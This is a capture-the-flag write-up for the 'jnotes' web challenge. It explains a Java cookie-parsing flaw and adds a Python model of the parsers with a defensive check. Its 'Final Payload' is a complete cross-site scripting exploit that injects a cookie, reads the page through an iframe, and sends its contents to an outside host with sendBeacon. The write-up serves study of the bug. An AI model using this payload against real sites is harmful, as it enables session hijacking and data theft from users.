# tl;dr

* Java mishandles cookies: when a cookie's value begins with a `"`, it takes everything up to the next `"` as that cookie's value, swallowing the cookies in between
* We can set a cookie with an empty name from JavaScript: `document.cookie="=value";`
* Use that to inject a new `note` cookie by putting `note` in the value: `document.cookie='=note="';`
* Make our cookie come first by giving it the path `//`, since Chrome sends cookies with longer paths first
* Now create an iframe with `//` as its src and read its innerHTML
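To make the first bullet concrete, here is an added Python model (not the challenge's Java code and not from the original writeup) of the two parsing behaviours: a lenient quote-aware parser that reproduces the described mishandling beside a strict RFC 6265 parser, plus a check a defender could run on incoming `Cookie` headers. The sample header is constructed.

```python
# Added example (not from the writeup): models the cookie parsing the tl;dr
# describes. parse_lenient reproduces the described Java behaviour (a value
# opening with '"' runs on to the next '"'); parse_strict follows RFC 6265,
# where quotes are ordinary characters and no cookie can absorb its neighbours.

# Constructed sample header: the first cookie's value is a lone '"'.
SAMPLE = 'note="; session=abc; note="hello"'

def parse_lenient(header: str) -> list[tuple[str, str]]:
    """Quote-aware parse: '"' at the start of a value extends it to the next '"'."""
    pairs, i, n = [], 0, len(header)
    while i < n:
        eq = header.find("=", i)
        if eq == -1:
            break
        name, j = header[i:eq].strip(), eq + 1
        if j < n and header[j] == '"':           # quoted value: scan for the closing
            end = header.find('"', j + 1)        # quote, ignoring any ';' in between
            end = n if end == -1 else end + 1
        else:                                    # plain value: ends at ';'
            end = header.find(";", j)
            end = n if end == -1 else end
        pairs.append((name, header[j:end].strip()))
        semi = header.find(";", end)
        i = n if semi == -1 else semi + 1
    return pairs

def parse_strict(header: str) -> list[tuple[str, str]]:
    """RFC 6265 parse: split on ';', then on the first '='; quotes stay in the value."""
    pairs = []
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:                                  # keep only well-formed name=value pairs
            pairs.append((name.strip(), value.strip()))
    return pairs

def suspicious(header: str) -> list[str]:
    """Defensive check on a strict parse: flags the shapes this attack depends on."""
    reasons, seen = [], set()
    for name, value in parse_strict(header):
        if not name:
            reasons.append("empty cookie name")
        if value.count('"') % 2:
            reasons.append(f"unbalanced quote in {name!r}")
        if name in seen:
            reasons.append(f"duplicate cookie name {name!r}")
        seen.add(name)
    return reasons
```

With the sample header the lenient parser returns a single `note` cookie whose value runs through `session` and into the second `note`, while the strict parser keeps all three cookies separate and the check flags the unbalanced quote and the duplicated name.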

## Final Payload

```html
<html>
<body>
<form method="POST" action="https://jnotes.mc.ax/create">
<input id="p" name="note" value="">
</form>
<script>
// The note body: closes the textarea, then a script that sets the empty-name
// cookie on path // and reads the page back through an iframe.
// \x73 is "s", so the inner script tags do not end the outer <script>.
document.querySelector("#p").value = `</textarea>
<\x73cript>
document.cookie='=note=";path=//';
const frame = document.createElement('iframe');
frame.src = "https://jnotes.mc.ax//";
document.body.appendChild(frame);
frame.onload = () => {
  navigator.sendBeacon("https://your.domain.com", frame.contentWindow.document.body.innerHTML);
}
</\x73cript>`;
document.forms[0].submit();
</script>
</body>
</html>
```

Original writeup: <https://lu513n.com/blog/posts/jnotes/>